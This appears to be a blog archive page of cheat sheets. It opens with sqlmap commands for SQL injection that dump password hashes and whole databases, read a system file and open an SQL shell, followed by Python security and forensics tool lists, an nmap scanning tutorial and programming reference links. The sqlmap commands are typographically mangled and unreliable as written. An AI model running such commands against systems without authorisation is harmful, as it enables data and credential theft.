Archive for the ‘Cheat sheets’ Category

Some useful sqlmap command for testing SQL injection vulnerability.

1) — Analyzing the current user is dba
python -u “url” –is-dba -v 1
2) — users: user list database management system
python -u “url” –users -v 0
3) — passwords: Database user password (hash)
python -u “url” –passwords -v 0
python -u “url” –passwords -U sa -v 0
4) To view the user permissions
python -u “url” –privileges -v 0
python -u “url” –privileges -U postgres -v 0
5) — dbs can use the database
python -u “url” –dbs -v 0
6) — tables column in a table
python -u “url” –tables -D “information_scheam”
-D: Specifies the name of the data
7) — columns are listed in the table column names
python -u “url” –columns -T “user” -D “mysql” -v 1
-T: Specify the table name, -D: Specifies the library name
8) — dump the contents of the column specified in the list
python -u “url” –dump -T “users” -D “testdb”
-C: You can specify fields
The specified column in the range of 2-4
python -u “url” –dump -T “users” -D “testdb” –start 2 –stop 4 -v 0
9) — dumap-all List all databases, all tables content
python -u “url” –dump-all -v 0
Only lists the contents of the user’s own new database and tables
python -u “url” –dump-all –exclude-sysdbs -v 0
10) — file to read the content of the document [load_file () function]
python -u “url” –file / etc / password
11) execute SQL
python -u “url” –sql-shell
12) -p parameter specified
python -u “url” -v 1 -p “id”
You can specify multiple -p parameter -p “cat, id”
13) POST submission
python -u “url” –method POST –data “id = 1”
14) COOKIE Submit
python -u “url” –cookie “id = 1” -v 1
cookie value can be crawled by the TamperData
15) refer to deceive
python -u “url” –refer “url” -v 3
16) using a custom user-agent or user-agents.txt
python -u “url” –user-agent “Mozilla / 4.0 (compatible; MSIE 7.0; Windows NT 5.1)” -v 3
python -u “url” -v 1 -a “./txt/user-agents.txt”
17) use of multithreading guess solution
python -u “url” -v 1 –current-user –threads 3
18) specify the database, bypassing the automatic detection SQLMAP
python -u “url” -v 2 –dbms “PostgreSQL”
19) Specifies the operating system automatically detects the bypass SQLMAP
python -u “url” -v 2 –os “Windows”
20) — prefix and –postfix custom payload
python -u “url” -v 3 -p “id” –prefix ” ‘” –postfix “and’ test ‘=’ test”
21) union injection test
python -u “url” –union-test -v -1
22) with the order by
python -u “url” –union-test –union-tech orderby -v 1
23) python -u “url” -v 1 –union-use –banner
24) python -u “url” -v 5 –union-use –current-user
25) python -u “url” -v 1 –union-use –dbs

Image result for python logo

If you are involved in vulnerability research, reverse engineering or penetration testing, I suggest to try out the Python programming language. It has a rich set of useful libraries and programs. This page lists some of them.
Most of the listed tools are written in Python, others are just Python bindings for existing C libraries, i.e. they make those libraries easily usable from Python programs.
Some of the more aggressive tools (pentest frameworks, bluetooth smashers, web application vulnerability scanners, war-dialers, etc.) are left out. This list is clearly meant to help whitehats, and for now I prefer to err on the safe side.


  • ScapyScapy3k: send, sniff and dissect and forge network packets. Usable interactively or as a library
  • pypcapPcapy and pylibpcap: several different Python bindings for libpcap
  • libdnet: low-level networking routines, including interface lookup and Ethernet frame transmission
  • dpkt: fast, simple packet creation/parsing, with definitions for the basic TCP/IP protocols
  • Impacket: craft and decode network packets. Includes support for higher-level protocols such as NMB and SMB
  • pynids: libnids wrapper offering sniffing, IP defragmentation, TCP stream reassembly and port scan detection
  • Dirtbags py-pcap: read pcap files without libpcap
  • flowgrep: grep through packet payloads using regular expressions
  • Knock Subdomain Scan, enumerate subdomains on a target domain through a wordlist
  • SubBrute, fast subdomain enumeration tool
  • Mallory, extensible TCP/UDP man-in-the-middle proxy, supports modifying non-standard protocols on the fly
  • Pytbull: flexible IDS/IPS testing framework (shipped with more than 300 tests)
  • Spoodle: A mass subdomain + poodle vulnerability scanner
  • SMBMap: enumerate Samba share drives across an entire domain

Debugging and reverse engineering

  • Paimei: reverse engineering framework, includes PyDBG, PIDA, pGRAPH
  • Immunity Debugger: scriptable GUI and command line debugger
  • PyCommand for Immunity Debugger that replaces and improves on pvefindaddr
  • IDAPython: IDA Pro plugin that integrates the Python programming language, allowing scripts to run in IDA Pro
  • PyEMU: fully scriptable IA-32 emulator, useful for malware analysis
  • pefile: read and work with Portable Executable (aka PE) files
  • pydasm: Python interface to the libdasm x86 disassembling library
  • PyDbgEng: Python wrapper for the Microsoft Windows Debugging Engine
  • uhooker: intercept calls to API calls inside DLLs, and also arbitrary addresses within the executable file in memory
  • diStorm: disassembler library for AMD64, licensed under the BSD license
  • python-ptrace: debugger using ptrace (Linux, BSD and Darwin system call to trace processes) written in Python
  • vdb / vtrace: vtrace is a cross-platform process debugging API implemented in python, and vdb is a debugger which uses it
  • Androguard: reverse engineering and analysis of Android applications
  • Capstone: lightweight multi-platform, multi-architecture disassembly framework with Python bindings
  • Keystone: lightweight multi-platform, multi-architecture assembler framework with Python bindings
  • PyBFD: Python interface to the GNU Binary File Descriptor (BFD) library
  • CHIPSEC: framework for analyzing the security of PC platforms including hardware, system firmware (BIOS/UEFI), and platform components.


  • afl-python: enables American fuzzy lop fork server and instrumentation for pure-Python code
  • Sulley: fuzzer development and fuzz testing framework consisting of multiple extensible components
  • Peach Fuzzing Platform: extensible fuzzing framework for generation and mutation based fuzzing (v2 was written in Python)
  • antiparser: fuzz testing and fault injection API
  • TAOF, (The Art of Fuzzing) including ProxyFuzz, a man-in-the-middle non-deterministic network fuzzer
  • untidy: general purpose XML fuzzer
  • Powerfuzzer: highly automated and fully customizable web fuzzer (HTTP protocol based application fuzzer)
  • Mistress: probe file formats on the fly and protocols with malformed data, based on pre-defined patterns
  • Fuzzbox: multi-codec media fuzzer
  • Forensic Fuzzing Tools: generate fuzzed files, fuzzed file systems, and file systems containing fuzzed files in order to test the robustness of forensics tools and examination systems
  • Windows IPC Fuzzing Tools: tools used to fuzz applications that use Windows Interprocess Communication mechanisms
  • WSBang: perform automated security testing of SOAP based web services
  • Construct: library for parsing and building of data structures (binary or textual). Define your data structures in a declarative manner
  • (feliam): simple fuzzer by Felipe Andres Manzano
  • Fusil: Python library used to write fuzzing programs


  • Requests: elegant and simple HTTP library, built for human beings
  • HTTPie: human-friendly cURL-like command line HTTP client
  • ProxMon: processes proxy logs and reports discovered issues
  • WSMap: find web service endpoints and discovery files
  • Twill: browse the Web from a command-line interface. Supports automated Web testing
  • webkit web client written in Python
  • Windmill: web testing tool designed to let you painlessly automate and debug your web application
  • FunkLoad: functional and load web tester
  • spynner: Programmatic web browsing module for Python with Javascript/AJAX support
  • python-spidermonkey: bridge to the Mozilla SpiderMonkey JavaScript engine; allows for the evaluation and calling of Javascript scripts and functions
  • mitmproxy: SSL-capable, intercepting HTTP proxy. Console interface allows traffic flows to be inspected and edited on the fly
  • pathod / pathoc: pathological daemon/client for tormenting HTTP clients and servers


  • Volatility: extract digital artifacts from volatile memory (RAM) samples
  • Rekall: memory analysis framework developed by Google
  • LibForensics: library for developing digital forensics applications
  • TrIDLib, identify file types from their binary signatures. Now includes Python binding
  • aft: Android forensic toolkit

Malware analysis

  • pyew: command line hexadecimal editor and disassembler, mainly to analyze malware
  • Exefilter: filter file formats in e-mails, web pages or files. Detects many common file formats and can remove active content
  • pyClamAV: add virus detection capabilities to your Python software
  • jsunpack-n, generic JavaScript unpacker: emulates browser functionality to detect exploits that target browser and browser plug-in vulnerabilities
  • yara-python: identify and classify malware samples
  • phoneyc: pure Python honeyclient implementation
  • CapTipper: analyse, explore and revive HTTP malicious traffic from PCAP file


  • peepdf: Python tool to analyse and explore PDF files to find out if they can be harmful
  • Didier Stevens’ PDF tools: analyse, identify and create PDF files (includes PDFiDpdf-parser and make-pdf and mPDF)
  • Opaf: Open PDF Analysis Framework. Converts PDF to an XML tree that can be analyzed and modified.
  • Origapy: Python wrapper for the Origami Ruby module which sanitizes PDF files
  • pyPDF2: pure Python PDF toolkit: extract info, spilt, merge, crop, encrypt, decrypt…
  • PDFMiner: extract text from PDF files
  • python-poppler-qt4: Python binding for the Poppler PDF library, including Qt4 support


  • InlineEgg: toolbox of classes for writing small assembly programs in Python
  • Exomind: framework for building decorated graphs and developing open-source intelligence modules and ideas, centered on social network services, search engines and instant messaging
  • RevHosts: enumerate virtual hosts for a given IP address
  • simplejson: JSON encoder/decoder, e.g. to use Google’s AJAX API
  • PyMangle: command line tool and a python library used to create word lists for use with other penetration testing tools
  • Hachoir: view and edit a binary stream field by field
  • py-mangle: command line tool and a python library used to create word lists for use with other penetration testing tools
  • execute Powershell commands quickly and easily via WMI
  • Pentestly: Python and Powershell internal penetration testing framework

Other useful libraries and tools

  • IPython: enhanced interactive Python shell with many features for object introspection, system shell access, and its own special command system
  • Beautiful Soup: HTML parser optimized for screen-scraping
  • matplotlib: make 2D plots of arrays
  • Mayavi: 3D scientific data visualization and plotting
  • RTGraph3D: create dynamic graphs in 3D
  • Twisted: event-driven networking engine
  • Suds: lightweight SOAP client for consuming Web Services
  • M2Crypto: most complete OpenSSL wrapper
  • NetworkX: graph library (edges, nodes)
  • Pandas: library providing high-performance, easy-to-use data structures and data analysis tools
  • pyparsing: general parsing module
  • lxml: most feature-rich and easy-to-use library for working with XML and HTML in the Python language
  • Whoosh: fast, featureful full-text indexing and searching library implemented in pure Python
  • Pexpect: control and automate other programs, similar to Don Libes `Expect` system
  • Sikuli, visual technology to search and automate GUIs using screenshots. Scriptable in Jython
  • PyQt and PySide: Python bindings for the Qt application framework and GUI library




Nmap is a powerful network scanner used to identify systems and services. nmap was originally developed with network security in mind, it is a tool that was designed to find vulnerabilities within a network. nmap is more than just a simple port scanner though, you can use nmap to find specific versions of services, certain OS types, or even find that pesky printer someone put on your network without telling you.

nmap can be used for good and for evil, today we will cover some common situations where nmap makes life easier for sysadmins which is generally good. Even if some Sysadmins are evil…

Discover IP’s in a subnet (no root)

 $ nmap -sP
 Starting Nmap 7.30 ( ) at 2016-10-12 21:12 GMT
 Nmap scan report for
 Host is up (0.0013s latency).
 Nmap scan report for
 Host is up (0.0032s latency).
 Nmap scan report for
 Host is up (0.0011s latency).

This is one of the simplest uses of nmap. This command is commonly refereed to as a “ping scan”, and tells nmap to send an icmp echo request, TCP SYN to port 443, TCP ACK to port 80 and icmp timestamp request to all hosts in the specified subnet. nmap will simply return a list of ip’s that responded. Unlike many nmap commands this particular one does not require root privileges, however when executed by root nmap will also by default send arp requests to the subnet.

Scan for open ports (no root)

 $ nmap
 Starting Nmap 7.30 ( ) at 2016-10-12 21:20 GMT
Nmap scan report for Host is up (0.0043s latency). Not shown: 998 closed ports PORT STATE SERVICE 80/tcp open http 443/tcp open https 

This scan is the default scan for nmap and can take some time to generate. With this scan nmap will attempt a TCP SYN connection to 1000 of the most common ports as well as an icmp echo request to determine if a host is up. nmap will also perform a DNS reverse lookup on the identified ip’s as this can sometimes be useful information.

Identify the Operating System of a host (requires root)

 # nmap -O
 Starting Nmap 7.30 ( ) at 2016-10-12 21:35 GMT
 Nmap scan report for
 Host is up (0.00032s latency).
 Not shown: 996 closed ports
 88/tcp open kerberos-sec
 139/tcp open netbios-ssn
 445/tcp open microsoft-ds
 631/tcp open ipp
 MAC Address: 00:00:00:00:00:00 (Unknown)
 Device type: general purpose
 Running: Apple Mac OS X 10.5.X
 OS details: Apple Mac OS X 10.5 - 10.6 (Leopard - Snow Leopard) (Darwin 9.0.0b5 - 10.0.0)
 Network Distance: 1 hop

With the -O option nmap will try to guess the targets operating system. This is accomplished by utilizing information that nmap is already getting through the TCP SYN port scan. This is usually a best guess but can actually be fairly accurate. The operating system scan however does require root privileges.

Identify Hostnames (no root)

 $ nmap -sL
 Starting Nmap 7.30 ( ) at 2016-10-12 21:35 GMT
 Nmap scan report for
 Nmap scan report for router.local (
 Nmap scan report for fake.local (
 Nmap scan report for another.fake.local (

This is one of the most subtle commands of nmap, the -sL flag tells nmap to do a simple DNS query for the specified ip. This allows you to find hostnames for all of the ip’s in a subnet without having send a packet to the individual hosts themselves.

Hostname information can tell you a lot more about a network than you would think, for instance if you labeled your Active Directory Servers with you shouldn’t be surprised if someone guesses its use.

TCP Syn and UDP Scan (requires root)

 # nmap -sS -sU -PN
 Starting Nmap 7.30 ( ) at 2016-10-12 21:12 GMT
 Nmap scan report for
 Host is up (0.00029s latency).
 Not shown: 1494 closed ports, 496 filtered ports
 88/tcp open kerberos-sec
 139/tcp open netbios-ssn
 445/tcp open microsoft-ds
 631/tcp open ipp
 88/udp open|filtered kerberos-sec
 123/udp open ntp
 137/udp open netbios-ns
 138/udp open|filtered netbios-dgm
 631/udp open|filtered ipp
 5353/udp open zeroconf

The TCP SYN and UDP scan will take a while to generate but is fairly unobtrusive and stealthy. This command will check about 2000 common tcp and udp ports to see if they are responding. When you use the -Pn flag this tells nmap to skip the ping scan and assume the host is up. This can be useful when there is a firewall that might be preventing icmp replies.

TCP SYN and UDP scan for all ports (requires root)

 # nmap -sS -sU -PN -p 1-65535
 Starting Nmap 7.30 ( ) at 2016-10-12 21:36 GMT
 Nmap scan report for
 Host is up (0.00021s latency).
 Not shown: 131051 closed ports
 88/tcp open kerberos-sec
 139/tcp open netbios-ssn
 445/tcp open microsoft-ds
 631/tcp open ipp
 17500/tcp open unknown
 88/udp open|filtered kerberos-sec
 123/udp open ntp
 137/udp open netbios-ns
 138/udp open|filtered netbios-dgm
 631/udp open|filtered ipp
 5353/udp open zeroconf
 17500/udp open|filtered unknown
 51657/udp open|filtered unknown
 54658/udp open|filtered unknown
 57798/udp open|filtered unknown
 58488/udp open|filtered unknown
 60027/udp open|filtered unknown

This command is the same as above however by specifying the full port range from 1 to 65535 nmap will scan to see if the host is listening on all available ports. You can use the port range specification on any scan that performs a port scan.

TCP Connect Scan (no root)

 $ nmap -sT
 Starting Nmap 7.30 ( ) at 2016-10-12 21:40 GMT
 Nmap scan report for
 Host is up (0.0015s latency).
 Not shown: 964 closed ports, 32 filtered ports
 88/tcp open kerberos-sec
 139/tcp open netbios-ssn
 445/tcp open microsoft-ds
 631/tcp open ipp

This command is similar to the TCP SYN scan however rather than sending a SYN packet and reviewing the headers it will ask the OS to establish a TCP connection to the 1000 common ports.

Aggressively Scan Hosts (no root)

 $ nmap -T4 -A
 Nmap scan report for
 Host is up (0.00060s latency).
 Not shown: 996 closed ports
 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (protocol 2.0)
 | ssh-hostkey: 1024 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:6c (DSA)
 |_2048 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:6c (RSA)
 80/tcp open http nginx 1.1.19
 |_http-title: 403 Forbidden
 |_http-methods: No Allow or Public header in OPTIONS response (status code 405)
 111/tcp open rpcbind
 | rpcinfo:
 | program version port/proto service
 | 100000 2,3,4 111/tcp rpcbind
 | 100000 2,3,4 111/udp rpcbind
 | 100003 2,3,4 2049/tcp nfs
 | 100003 2,3,4 2049/udp nfs
 | 100005 1,2,3 46448/tcp mountd
 | 100005 1,2,3 52408/udp mountd
 | 100021 1,3,4 35394/udp nlockmgr
 | 100021 1,3,4 57150/tcp nlockmgr
 | 100024 1 49363/tcp status
 | 100024 1 51515/udp status
 | 100227 2,3 2049/tcp nfs_acl
 |_ 100227 2,3 2049/udp nfs_acl
 2049/tcp open nfs (nfs V2-4) 2-4 (rpc #100003)
 Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Unlike some of the earlier commands this command is very aggressive and very obtrusive. The -A simply tells nmap to perform OS checking and version checking. The -T4 is for the speed template, these templates are what tells nmap how quickly to perform the scan. The speed template ranges from 0 for slow and stealthy to 5 for fast and obvious.

Fast Scan (no root)

 $ nmap -T4 -F
 Starting Nmap 7.30 ( ) at 2016-10-12 21:48 GMT
 Nmap scan report for
 Host is up (0.00047s latency).
 Not shown: 96 closed ports
 88/tcp open kerberos-sec
 139/tcp open netbios-ssn
 445/tcp open microsoft-ds
 631/tcp open ipp

This scan limits the scan to the most common 100 ports, if you simply want to know some potential hosts with ports open that shouldn’t be this is a quick and dirty command to use.


 $ nmap -T4 -A -v
 Starting Nmap 7.30 ( ) at 2016-10-12 21:50 GMT
 NSE: Loaded 93 scripts for scanning.
 NSE: Script Pre-scanning.
 Initiating Ping Scan at 21:50
 Scanning [2 ports]
 Completed Ping Scan at 21:50, 0.00s elapsed (1 total hosts)
 Initiating Parallel DNS resolution of 1 host. at 21:50
 Completed Parallel DNS resolution of 1 host. at 21:50, 0.01s elapsed
 Initiating Connect Scan at 21:50
 Scanning [1000 ports]
 Discovered open port 139/tcp on
 Discovered open port 445/tcp on
 Discovered open port 88/tcp on
 Discovered open port 631/tcp on
 Completed Connect Scan at 21:50, 5.22s elapsed (1000 total ports)
 Initiating Service scan at 21:50
 Scanning 4 services on
 Completed Service scan at 21:51, 11.00s elapsed (4 services on 1 host)
 NSE: Script scanning
 Initiating NSE at 21:51
 Completed NSE at 21:51, 12.11s elapsed
 Nmap scan report for
 Host is up (0.00026s latency).
 Not shown: 996 closed ports
 88/tcp open kerberos-sec Mac OS X kerberos-sec
 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
 631/tcp open ipp CUPS 1.4
 | http-methods: GET HEAD OPTIONS POST PUT
 | Potentially risky methods: PUT
 | http-robots.txt: 1 disallowed entry
 Service Info: OS: Mac OS X; CPE: cpe:/o:apple:mac_os_x

By adding verbose to a majority of the commands above you get a better insight into what nmap is doing; for some scans verbosity will provide additional details that the report does not provide.
While these are 10 very useful nmap commands I am sure there are some more handy nmap examples out there. If you have one to add to this list feel free to drop it into a comment.

Performing a nMap Scan


Here is some help for you guys and gals that are looking for some forensic tools, they can also be good fun to mess around with.

1. Disk tools and data capture

Arsenal Image Mounter :
Mounts disk images as complete disks in Windows, giving access to Volume Shadow Copies, etc.
DumpIt :
Generates physical memory dump of Windows machines, 32 bits 64 bit. Can run from a USB flash drive.
EnCase :
Create EnCase evidence files and EnCase logical evidence files
Encrypted Disk Detector :
Checks local physical drives on a system for TrueCrypt, PGP, or Bitlocker encrypted volumes
EWF MetaEditor :
Edit EWF (E01) meta data, remove passwords (Encase v6 and earlier)
FAT32 Format :
Enables large capacity disks to be formatted as FAT32
Forensics Acquisition of Websites :
Browser designed to forensically capture web pages
FTK Imager :
Imaging tool, disk viewer and image mounter
Guymager :
Multi-threaded GUI imager under running under Linux
Live RAM Capturer :
Extracts RAM dump including that protected by an anti-debugging or anti-dumping system. 32 and 64 bit builds
NetworkMiner :
Network analysis tool. Detects OS, hostname and open ports of network hosts through packet sniffing/PCAP parsing
Nmap :
Utility for network discovery and security auditing
Magnet RAM :
Captures physical memory of a suspect’s computer. Windows XP to Windows 10, and 2003, 2008, 2012. 32 & 64 bit
OSFClone :
Boot utility for CD/DVD or USB flash drives to create dd or AFF images/clones.
OSFMount :
Mounts a wide range of disk images. Also allows creation of RAM disks
Wireshark :
Network protocol capture and analysis
Disk2vhd :
Creates Virtual Hard Disks versions of physical disks for use in Microsoft Virtual PC or Microsoft Hyper-V VMs

2. Email analysis

EDB Viewer :
Open and view (not export) Outlook EDB files without an Exchange server
Mail Viewer :
Viewer for Outlook Express, Windows Mail/Windows Live Mail, Mozilla Thunderbird message databases and single EML files
MBOX Viewer :
View MBOX emails and attachments
OST Viewer  :
Open and view (not export) Outlook OST files without connecting to an Exchange server
PST Viewer  :
Open and view (not export) Outlook PST files without needing Outlook
3. General tools

Agent Ransack :
Search multiple files using Boolean operators and Perl Regex
Computer Forensic Reference Data Sets :
Collated forensic images for training, practice and validation
EvidenceMover :
Copies data between locations, with file comparison, verification, logging
FastCopy :
Self labelled ‘fastest’ copy/delete Windows software. Can verify with SHA-1, etc.
File Signatures :
Table of file signatures
HexBrowser :
Identifies over 1000 file types by examining their signatures
HashMyFiles :
Calculate MD5 and SHA1 hashes
MobaLiveCD :
Run Linux live CDs from their ISO image without having to boot to them
Mouse Jiggler :
Automatically moves mouse pointer stopping screen saver, hibernation etc.
Notepad ++ :
Advanced Notepad replacement
Hash sets of ‘known’ (ignorable) files
Quick Hash :
A Linux & Windows GUI for individual and recursive SHA1 hashing of files
USB Write Blocker :
Enables software write-blocking of USB ports
Volix :
Application that simplifies the use of the Volatility Framework
Windows Forensic Environment :
Guide by Brett Shavers to creating and working with a Windows boot CD
4. File and data analysis

Advanced Prefetch Analyser :
Reads Windows XP,Vista and Windows 7 prefetch files
analyzeMFT :
Parses the MFT from an NTFS file system allowing results to be analysed with other tools
bstrings :
Find strings in binary data, including regular expression searching.
CapAnalysis :
PCAP viewer
Crowd Reponse :
Windows console application to aid gathering of system information for incident response and security engagements.
Crowd Inspect :
Details network processes, listing binaries associated with each process. Queries VirusTotal, other malware repositories & reputation services to produce “at-a-glance” state of the system
DCode :
Converts various data types to date/time values
Defraser :
Detects full and partial multimedia files in unallocated space
eCryptfs Parser :
Recursively parses headers of every eCryptfs file in selected directory. Outputs encryption algorithm used, original file size, signature used, etc.
Encryption Analyzer :
Scans a computer for password-protected & encrypted files, reports encryption complexity and decryption options for each file
ExifTool :
Read, write and edit Exif data in a large number of file types
File Identifier :
Drag and drop web-browser JavaScript tool for identification of over 2000 file types
Forensic Image Viewer :
View various picture formats, image enhancer, extraction of embedded Exif, GPS data
Ghiro :
In-depth analysis of image (picture) files
Highlighter :
Examine log files using text, graphic or histogram views
Link Parser :
Recursively parses folders extracting 30+ attributes from Windows .lnk (shortcut) files
LiveContactsView :
View and export Windows Live Messenger contact details
PECmd :
Prefetch Explorer
PlatformAuditProbe :
Command Line Windows forensic/ incident response tool that collects many artefacts. Manual
RSA Netwitness Investigator :
Network packet capture and analysis!freeware
Memoryze :
Acquire and/or analyse RAM images, including the page file on live systems
MetaExtractor :
Recursively parses folders to extract meta data from MS Office, OpenOffice and PDF files
MFTview :
Displays and decodes contents of an extracted MFT file
PictureBox :
Lists EXIF, and where available, GPS data for all photographs present in a directory. Export data to .xls or Google Earth KML format
PsTools :
Suite of command-line Windows utilities
Shadow Explorer :
Browse and extract files from shadow copies
SQLite Manager :
Firefox add-on enabling viewing of any SQLite
Strings :
Command-line tool for text searches
Structured Storage Viewer :
View and manage MS OLE Structured Storage based files
Switch-a-Roo :
Text replacement/converter/decoder for when dealing with URL encoding, etc
Windows File Analyzer :
Analyse thumbs.db, Prefetch, INFO2 and .lnk files
Xplico :
Network forensics analysis tool
5. Mac OS tools

Audit :
Audit Preference Pane and Log Reader for OS X
ChainBreaker :
Parses keychain structure, extracting user’s confidential information such as application account/password, encrypted volume password (e.g. filevault), etc
Disk Arbitrator :
Blocks the mounting of file systems, complimenting a write blocker in disabling disk arbitration
Epoch Converter :
Converts epoch times to local time and UTC
FTK Imager CLI for Mac OS :
Command line Mac OS version of AccessData’s FTK Imager
IORegInfo :
Lists items connected to the computer (e.g., SATA, USB and FireWire Drives, software RAID sets). Can locate partition information, including sizes, types, and the bus to which the device is connected
PMAP Info :
Displays the physical partitioning of the specified device. Can be used to map out all the drive information, accounting for all used sectors
Volafox :
Memory forensic toolkit for Mac OS X
6. Mobile devices

iPBA2 :
Explore iOS backups
iPhone Analyzer :
Explore the internal file structure of Pad, iPod and iPhones
ivMeta :
Extracts phone model and software version and created date and GPS data from iPhone videos.
Last SIM Details :
Parses physical flash dumps and Nokia PM records to find details of previously inserted SIM cards.
Rubus :
Deconstructs Blackberry .ipd backup files
Obtain SMS Messages, call logs and contacts from Android devices
7. Data analysis suites

Autopsy :
Graphical interface to the command line digital investigation analysis tools in The Sleuth Kit (see below)
Backtrack :
Penetration testing and security audit with forensic boot capability
Caine :
Linux based live CD, featuring a number of analysis tools
Deft :
Linux based live CD, featuring a number of analysis tools
Digital Forensics Framework :
Analyses volumes, file systems, user and applications data, extracting metadata, deleted and hidden items
Forensic Scanner :
Automates ‘repetitive tasks of data collection’. Fuller description here
Paladin :
Ubuntu based live boot CD for imaging and analysis
VMware Appliance pre-configured with multiple tools allowing digital forensic examinations
The Sleuth Kit :
Collection of UNIX-based command line file and volume system forensic analysis tools
Volatility Framework :
Collection of tools for the extraction of artefacts from RAM

8. Internet analysis
MozillaHistoryView :
Reads the history.dat of Firefox/Mozilla/Netscape Web browsers, and displays the list of all visited Web page
MyLastSearch :
Extracts search queries made with popular search engines (Google, Yahoo and MSN) and social networking sites (Twitter, Facebook, MySpace)
PasswordFox :
Extracts the user names and passwords stored by Mozilla Firefox Web browser
OperaCacheView :
Reads the cache folder of Opera Web browser, and displays the list of all files currently stored in the cache
OperaPassView :
Decrypts the content of the Opera Web browser password file, wand.dat
Web Historian :
Reviews list of URLs stored in the history files of the most commonly used browsers
Web Page Saver :
Takes list of URLs saving scrolling captures of each page. Produces HTML report file containing the saved pages

9. Registry analysis

AppCompatCache Parser :
Dumps list of shimcache entries showing which executables were run and their modification dates. Further details.
ForensicUserInfo :
Extracts user information from the SAM, SOFTWARE and SYSTEM hives files and decrypts the LM/NT hashes from the SAM file
Process Monitor :
Examine Windows processes and registry threads in real time
RECmd :
Command line access to offline Registry hives. Supports simple & regular expression searches as well as searching by last write timestamp. Further details.
Registry Decoder :
For the acquisition, analysis, and reporting of registry contents
Registry Explorer :
Offline Registry viewer. Provides deleted artefact recovery, value slack support, and robust searching. Further details.
RegRipper :
Registry data extraction and correlation tool
Regshot :
Takes snapshots of the registry allowing comparisons e.g., show registry changes after installing software
ShellBags Explorer  :
Presents visual representation of what a user’s directory structure looked like. Additionally exposes various timestamps (e.g., first explored, last explored for a given folder. Further details.
USB Device Forensics :
Details previously attached USB devices on exported registry hives
USB Historian :
Displays 20+ attributes relating to USB device use on Windows systems
USBDeview :
Details previously attached USB devices
User Assist Analysis :
Extracts SID, User Names, Indexes, Application Names, Run Counts, Session, and Last Run Time Attributes from UserAssist keys
UserAssist :
Displays list of programs run, with run count and last run date and time
Windows Registry Recovery :
Extracts configuration settings and other information from the Registry
10. Application analysis

Dropbox Decryptor :
Decrypts the Dropbox filecache.dbx file which stores information about files that have been synced to the cloud using Dropbox
Google Maps Tile Investigator :
Takes x,y,z coordinates found in a tile filename and downloads surrounding tiles providing more context
KaZAlyser :
Extracts various data from the KaZaA application
LiveContactsView :
View and export Windows Live Messenger contact details
SkypeLogView :
View Skype calls and chats

tv - programer


I know personally, I am not one of those people that can remember every detail of every language and never look anything up. It’s nice to have a cheat sheet with a quick summary of some of the most commonly used procedures, tags, tools, syntax, etc., saving time that would have been used to look it up on Google or dig through documentation either online or in printed text. The following is a list of links to several different cheat sheets on a wide variety of tasks and tools.

You can print them out and hang them on your wall (my personal choice) or simply bookmark them for easy access down the road. If you have any additional suggestions or see something I have missed, let me know…


Command Line

Windows Command Line Reference

BASH Command Line Reference

DOS Commands



MySQL Cheat Sheet

MySQL Reference List

Oracle Cheat Sheet

Oracle PL/SQL Cheat Sheet

Oracle 9i Server Reference (PDF)

Oracle 9i Command Reference

PostgreSQL Cheat Sheet

SQL Cheat Sheet

SQL Server 2005 Commands



Ada Syntax Card (PDF)

ASP/VBScript Cheat Sheet

C++ Language Summary

C++ Reference Sheet (PDF)

C++ Containers Cheat Sheet

C# Language Reference

Delphi Technical Reference Card (PDF)

Java Syntax Cheat Sheet

Java Quick Reference (PDF)

Java Reference for C++

JSP 2.0 Syntax Reference Sheet (PDF)

LaTEX Reference Card (PDF)

PERL Cheat Sheet

PERL Reference Card (PDF)

PERL Regular Expression Quick Reference (PDF)

PERL Reference Guide

PHP Cheat Sheet

PHP Developer Cheat Sheet

Python 101 Cheat Sheet

Python Cheat Sheet

Python Quick Reference (PDF)

Ruby Cheat Sheet (PDF)

Ruby Reference

Ruby on Rails Reference Sheet



Debian Linux Reference Guide (PDF)

Linux Shortcuts and Commands

One Page Linux Manual (PDF)

TCP Ports List

Treebeard’s Unix Cheat Sheet

Unix Command Line Tips


Web Development

Actionscript 2.0 Cheat Sheet (PDF)

Actionscript 3.0 Cheat Sheet (PDF)

CSS Cheat Sheet

CSS 2 Reference Card (PDF)

CSS Reference Sheet

CSS Shorthand Guide

CSS Useful Properties

Drupal 4.7 Cheat Sheet

.htaccess Cheat Sheet

HTML Cheat Sheet

HTML Dom Quick Reference Card (PDF)

Javascript Cheat Sheet

Javascript Quick Reference

Javascript Reference Page

JQuery Cheat Sheet (PDF)

JQuery Reference (PDF)

Mod_Rewrite Cheat Sheet

Scriptaculous Combination Effects Field Guide (PDF)

XHTML Cheat sheet

XHTML Reference

XHTML & HTML Cheat Sheet

XML Syntax Quick Reference (PDF)

XML Schema Reference (PDF)

XSLT and XPath Quick Reference (PDF)


Miscellaneous Topics

Ascii Codes Cheat Sheet

CVS Cheat Sheet

Regular Expressions Cheat Sheet

RGB Hex Colour Chart

Subversion Quick Reference (PDF)

Theoretical Computer Science Cheat Sheet (PDF)

UML Quick Reference Card (PDF)

UML Cheat Sheet

Vi Cheat Sheet

Vim Commands Cheat Sheet

XEmacs Commands Cheat Sheet


tv - programer

When working on an app or a code, you may often need some reference material that’s where cheatsheets become very useful.

Here we present to you with an A-Z of cheatsheets that are relevant to programmers and developers. It doesn’t cover all languages or databases, but you’ll find most of what you need. If there’s anything missing, feel free to let us know so we can do better.

1. Asynchronous JavaScript And XML (AJAX): This is a group of interrelated web development techniques that are used to create asynchronous web applications on the client side.

2. Apache: If you’re using the Apache HTTP server then this cheat sheet is just what you would need in front of you.

3. Apache Ant: This java library and command line tool is used for automating software build processes.

4. Apache Cassandra: The open source distributed database management system is often the first pick when scalability is a concern.

5. American Standard Code for Information Interchange (ASCII): The most common character encoding scheme.

6. Berkeley DB: Oracle’s Berkeley DB is a fast and reliable option chosen by many developers.

7. Blueprint: This is a cheatsheet on the popular CSS framework/

8. C: In many ways it is the father of some of the most popular programming languages.

9. C#: A cheatsheet on C# never goes to waste. Most programmers learn the language and a cheatsheet always helps.

10. C++: One of the most useful programming languages ever. It is a must learn language for programmers.

11. Calculus and Analysis: Programmers and developers often need to have a good grasp on calculus and analysis in order to build certain types of apps.

12. Clojure: One of the most popular languages running on the Java Virtual Machine.

13. CSS: Cascading Style Sheets along with HTML is the language of the internet.

